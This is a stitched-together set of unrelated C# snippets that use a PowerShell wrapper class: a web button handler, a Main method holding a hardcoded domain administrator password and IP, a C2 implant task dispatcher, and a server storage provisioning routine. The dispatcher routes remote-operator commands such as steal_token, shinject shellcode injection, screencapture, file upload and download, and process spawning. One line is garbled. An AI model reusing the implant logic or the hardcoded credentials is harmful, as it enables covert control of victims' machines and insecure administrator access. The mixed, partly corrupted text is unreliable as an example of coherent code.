protected void btnDLL_Click(object sender, EventArgs e)
{
Powershell oPowershell = new Powershell();
Log oLog = new Log(0, dsn);
List <PowershellParameter> powershell = new List <PowershellParameter>();
powershell.Add(new PowershellParameter("path", "C:"));
List <PowershellParameter> results = oPowershell.Execute(Request.PhysicalApplicationPath + "scripts\\test.ps1", powershell, oLog, "DEV");
foreach (PowershellParameter result in results)
{
Response.Write(result.Name + " = " + result.Value + "<br/>");
}
}
public static void Main(string[] args)
{
Dictionary <string, string> par = new Dictionary <string, string>();
par.Add("UserPrincipalName", "*****@*****.**");
//ad.GetDomain();
var ps = new Powershell();
ps.CreateRemoteSession("TESTAD0\\Administrator", "Games4Free", "10.80.1.85");
var ad = new AD(ps);
// ad.CreateOrgranization("N***a" , new Dictionary<string, string>());
var ret = ps.Execute("Get-ADDomain");
/* ps.CloseRemoteSession();
* var ret1 = ps.Execute("Get-ADDomain");*/
Console.ReadLine();
}
/// <summary>
/// Handle a new task.
/// </summary>
/// <param name="implant">The CaramelImplant we're handling a task for</param>
public void DispatchTask(SCImplant implant)
{
if (this.command == "cd")
{
Debug.WriteLine("[-] DispatchTask - Tasked to change directory " + this.@params);
ChangeDir.Execute(this);
}
else if (this.command == "download")
{
Debug.WriteLine("[-] DispatchTask - Tasked to send file " + this.@params);
Download.Execute(this, implant);
}
else if (this.command == "execute_assembly")
{
Debug.WriteLine("[-] DispatchTask - Tasked to execute assembly " + this.@params);
Tasks.ExecAssembly.Execute(this, implant);
}
else if (this.command == "exit")
{
Debug.WriteLine("[-] DispatchTask - Tasked to exit");
Exit.Execute(this, implant);
}
else if (this.command == "jobs")
{
Debug.WriteLine("[-] DispatchTask - Tasked to list jobs");
Jobs.Execute(this, implant);
}
else if (this.command == "jobkill")
{
Debug.WriteLine($"[-] DispatchTask - Tasked to kill job {this.@params}");
Jobs.Execute(this, implant);
}
else if (this.command == "kill")
{
Debug.WriteLine("[-] DispatchTask - Tasked to kill PID " + this.@params);
Kill.Execute(this);
}
else if (this.command == "ls")
{
string path = this.@params;
Debug.WriteLine("[-] DispatchTask - Tasked to list directory " + path);
DirectoryList.Execute(this, implant);
}
else if (this.command == "make_token")
{
Debug.WriteLine("[-] DispatchTask - Tasked to make a token for " + [email protected](' ')[0]);
Token.Execute(this);
}
else if (this.command == "ps")
{
Debug.WriteLine("[-] DispatchTask - Tasked to list processes");
ProcessList.Execute(this);
}
else if (this.command == "powershell")
{
Debug.WriteLine("[-] DispatchTask - Tasked to run powershell");
Powershell.Execute(this);
}
else if (this.command == "rev2self")
{
Debug.WriteLine("[-] DispatchTask - Tasked to revert token");
Token.Revert(this);
}
else if (this.command == "run")
{
Debug.WriteLine("[-] DispatchTask - Tasked to start process");
Proc.Execute(this, implant);
}
else if (this.command == "screencapture")
{
Debug.WriteLine("[-] DispatchTask - Tasked to take screenshot.");
ScreenCapture.Execute(this, implant);
}
else if (this.command == "shell")
{
Debug.WriteLine("[-] DispatchTask - Tasked to run shell command.");
Proc.Execute(this, implant);
}
else if (this.command == "shinject")
{
Debug.WriteLine("[-] DispatchTask - Tasked to run shellcode.");
Shellcode.Execute(this);
}
else if (this.command == "sleep")
{
try
{
int sleep = Convert.ToInt32(this.@params);
Debug.WriteLine("[-] DispatchTask - Tasked to change sleep to: " + sleep);
implant.sleep = sleep * 1000;
this.status = "complete";
}
catch
{
Debug.WriteLine("[-] DispatchTask - ERROR sleep value provided was not int");
this.status = "error";
this.message = "Please provide an integer value";
}
}
else if (this.command == "spawn")
{
Debug.WriteLine("[-] DispatchTask - Tasked to spawn");
Spawn.Execute(this);
}
else if (this.command == "steal_token")
{
Debug.WriteLine("[-] DispatchTask - Tasked to steal token");
Token.Execute(this);
}
else if (this.command == "upload")
{
Debug.WriteLine("[-] DispatchTask - Tasked to get file from server");
Upload.Execute(this, implant);
}
this.SendResult(implant);
}
public void NonShared()
{
//// Initiate Timer
//int intTimeout = 10; // minutes for all registrations
//if (Debug)
// oEventLog.WriteEntry(String.Format("Starting Avamar Registration Thread."), EventLogEntryType.Information);
//Timeout timeout = new Timeout(TimeoutType.Minutes, intTimeout, oEventLog, Debug);
//ThreadStart tTimeoutStart = new ThreadStart(timeout.Begin);
//Thread tTimeout = new Thread(tTimeoutStart);
//tTimeout.Start();
try
{
this.Starter.NonSharedStorage = true;
// Setup Classes
Servers oServer = new Servers(0, dsn);
OperatingSystems oOperatingSystem = new OperatingSystems(0, dsn);
Log oLog = new Log(0, dsn);
DataSet dsNew = oServer.GetStorageConfigured();
if (dsNew.Tables[0].Rows.Count > 0)
{
foreach (DataRow drNew in dsNew.Tables[0].Rows)
{
int intServer = Int32.Parse(drNew["id"].ToString());
int intOS = Int32.Parse(drNew["osid"].ToString());
int intAnswer = Int32.Parse(drNew["answerid"].ToString());
int intNumber = Int32.Parse(drNew["number"].ToString());
string Name = drNew["servername"].ToString();
string IP = drNew["ipaddress"].ToString();
if (oOperatingSystem.IsWindows(intOS) || oOperatingSystem.IsWindows2008(intOS))
{
// First, check to make sure it's available (pinging) in DNS
//bool InDNS = false;
//Ping Ping = new Ping();
//string PingStatus = "";
//try
//{
// PingReply Reply = Ping.Send(Name);
// PingStatus = Reply.Status.ToString().ToUpper();
// if (PingStatus == "SUCCESS")
// {
// InDNS = true;
// break;
// }
//}
//catch { }
//if (InDNS)
//{
// Serverprocessing.ps1 -AnswerID 26622 -ServerNumber 1 –Environment "Albert_Dev" –IPAddressToConnect "10.24.240.205" – ConfigureNonSharedStorage -Log
string command = "Serverprocessing.ps1 -AnswerID " + intAnswer.ToString() + " -ServerNumber " + intNumber.ToString() + " –Environment \"" + this.Starter.ScriptEnvironment + "\" –IPAddressToConnect \"" + IP + "\" – ConfigureNonSharedStorage -Log";
oLog.AddEvent(intAnswer, Name, "Non-shared storage", "Starting automated script (" + command + ")...", LoggingType.Debug);
string error = "";
try
{
List <PowershellParameter> powershell = new List <PowershellParameter>();
Powershell oPowershell = new Powershell();
powershell.Add(new PowershellParameter("AnswerID", intAnswer.ToString()));
powershell.Add(new PowershellParameter("ServerNumber", intNumber.ToString()));
powershell.Add(new PowershellParameter("Environment", this.Starter.ScriptEnvironment));
powershell.Add(new PowershellParameter("IPAddressToConnect", IP));
powershell.Add(new PowershellParameter("ConfigureNonSharedStorage", null));
powershell.Add(new PowershellParameter("Log", null));
List <PowershellParameter> results = oPowershell.Execute(this.Starter.strScripts + "\\Serverprocessing.ps1", powershell, oLog, Name);
oLog.AddEvent(intAnswer, Name, "Non-shared storage", "Powershell script completed!", LoggingType.Debug);
bool PowerShellError = false;
foreach (PowershellParameter result in results)
{
oLog.AddEvent(intAnswer, Name, "Non-shared storage", "PSOBJECT: " + result.Name + " = " + result.Value, LoggingType.Information);
if (result.Name == "ResultCode" && result.Value.ToString() != "0")
{
PowerShellError = true;
}
else if (result.Name == "Message" && PowerShellError)
{
error = result.Value.ToString();
}
}
}
catch (Exception exPowershell)
{
error = exPowershell.Message;
}
if (String.IsNullOrEmpty(error))
{
oServer.UpdateStorageConfigured(intServer, DateTime.Now.ToString());
}
else
{
oLog.AddEvent(intAnswer, Name, "", error, LoggingType.Error);
oServer.AddError(0, 0, 0, intServer, 99991, error);
}
//}
//else
// oLog.AddEvent(intAnswer, Name, "Non-shared storage", "DNS is not registered yet...", LoggingType.Debug);
}
else
{
oServer.UpdateStorageConfigured(intServer, DateTime.Now.ToString());
}
}
}
}
catch (Exception ex)
{
string error = ex.Message + " ~ (Source: " + ex.Source + ") (Stack Trace: " + ex.StackTrace + ")";
oEventLog.WriteEntry(error, EventLogEntryType.Error);
}
finally
{
this.Starter.NonSharedStorage = false;
//timeout.StopIt = true; // Kill timeout thread.
}
}